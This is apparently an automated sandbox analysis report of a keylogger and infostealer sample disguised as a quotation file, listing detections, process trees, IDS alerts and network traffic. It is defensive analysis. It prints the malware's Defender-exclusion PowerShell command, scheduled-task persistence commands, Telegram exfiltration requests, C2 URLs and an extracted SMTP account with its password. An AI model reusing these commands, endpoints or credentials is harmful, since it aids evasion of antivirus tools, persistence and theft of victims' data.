Windows Analysis Report
QUOTATION REQUIRED_Enatel s.r.l..bat.exe

Overview

General Information

Sample name:QUOTATION REQUIRED_Enatel s.r.l..bat.exe
Analysis ID:1589989
MD5:dac368e84e853adec2a5bb1cd87cd1c6
SHA1:139c10cfa59c1e25039c02671010009de25a2690
SHA256:ece7de25d48e50e93d3d60f600a7676fe24a520916844f6826b4837ac8dd7ebc
Tags:exe, user-adrian__luca

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • QUOTATION REQUIRED_Enatel s.r.l..bat.exe (PID: 5748 cmdline: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe" MD5: DAC368E84E853ADEC2A5BB1CD87CD1C6)
    • powershell.exe (PID: 2152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2832 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3284 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 1532 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • vTAuFgZcVE.exe (PID: 6752 cmdline: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe MD5: DAC368E84E853ADEC2A5BB1CD87CD1C6)
    • schtasks.exe (PID: 2788 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 3760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x2e809:$a1: get_encryptedPassword
  • 0x2eb26:$a2: get_encryptedUsername
  • 0x2e619:$a3: get_timePasswordChanged
  • 0x2e722:$a4: get_passwordField
  • 0x2e81f:$a5: set_encryptedPassword
  • 0x2feba:$a7: get_logins
  • 0x2fe1d:$a10: KeyLoggerEventArgs
  • 0x2fa82:$a11: KeyLoggerEventArgsEventHandler

Source | Rule | Description | Author | Strings
8.2.vTAuFgZcVE.exe.2a986a8.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.68c0000.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.2b18834.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.68c0000.5.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
12.2.vbc.exe.400000.0.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |
  • 0x3bd4e:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x3b3f1:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x3b64e:$a4: \Orbitum\User Data\Default\Login Data
  • 0x3c02d:$a5: \Kometa\User Data\Default\Login Data

                  System Summary

                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe", ParentImage: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ParentProcessId: 5748, ParentProcessName: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", ProcessId: 2152, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe, ParentImage: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe, ParentProcessId: 6752, ParentProcessName: vTAuFgZcVE.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp", ProcessId: 2788, ProcessName: schtasks.exe
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49752
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe", ParentImage: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ParentProcessId: 5748, ParentProcessName: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp", ProcessId: 3284, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe", ParentImage: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ParentProcessId: 5748, ParentProcessName: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", ProcessId: 2152, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe", ParentImage: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ParentProcessId: 5748, ParentProcessName: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp", ProcessId: 3284, ProcessName: schtasks.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2025-01-13T13:05:42.450306+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 104.21.112.1 | 443 | TCP
                  2025-01-13T13:05:43.625419+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49718 | 104.21.112.1 | 443 | TCP
                  2025-01-13T13:05:45.044845+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49722 | 104.21.112.1 | 443 | TCP
                  2025-01-13T13:05:46.860599+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49727 | 104.21.112.1 | 443 | TCP
                  2025-01-13T13:05:49.596058+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49735 | 104.21.112.1 | 443 | TCP
                  2025-01-13T13:05:49.804688+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49736 | 104.21.112.1 | 443 | TCP
                  2025-01-13T13:05:52.512798+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49746 | 104.21.112.1 | 443 | TCP

                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2025-01-13T13:05:39.859137+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49709 | 132.226.8.169 | 80 | TCP
                  2025-01-13T13:05:41.859041+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49709 | 132.226.8.169 | 80 | TCP
                  2025-01-13T13:05:42.077762+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49712 | 132.226.8.169 | 80 | TCP
                  2025-01-13T13:05:43.062131+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49712 | 132.226.8.169 | 80 | TCP
                  2025-01-13T13:05:43.327755+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49717 | 132.226.8.169 | 80 | TCP
                  2025-01-13T13:05:44.515344+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49720 | 132.226.8.169 | 80 | TCP
                  2025-01-13T13:05:44.796487+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49721 | 132.226.8.169 | 80 | TCP

                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2025-01-13T13:05:53.687599+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49749 | 149.154.167.220 | 443 | TCP
                  2025-01-13T13:05:54.883718+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49751 | 149.154.167.220 | 443 | TCP

                  AV Detection

                  Source: 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeReversingLabs: Detection: 39%
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeReversingLabs: Detection: 39%
                  Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeJoe Sandbox ML: detected
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeJoe Sandbox ML: detected

                  Location Tracking

                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49714 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49716 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49751 version: TLS 1.2
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: SnHY.pdb source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, vTAuFgZcVE.exe.0.dr
                  Source: Binary string: SnHY.pdbSHA256 source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, vTAuFgZcVE.exe.0.dr

                  Networking

                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49749 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49751 -> 149.154.167.220:443
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.8:49752 -> 208.91.199.223:587
                  Source: global trafficTCP traffic: 192.168.2.8:60445 -> 208.91.198.143:587
                  Source: global trafficTCP traffic: 192.168.2.8:60441 -> 162.159.36.2:53
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:19:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:09:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox View, IP Address: 132.226.8.169
                  Source: Joe Sandbox View, IP Address: 208.91.198.143
                  Source: Joe Sandbox View, IP Address: 149.154.167.220
                  Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49721 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49717 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49720 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49712 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49727 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49718 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49746 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49736 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49735 -> 104.21.112.1:443
                  Source: global trafficTCP traffic: 192.168.2.8:49752 -> 208.91.199.223:587
                  Source: global trafficTCP traffic: 192.168.2.8:60445 -> 208.91.198.143:587
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49714 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49716 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:19:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:09:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                  Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 12:05:53 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 12:05:54 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: vbc.exe, 00000007.00000002.4059070573.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.000000000708E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
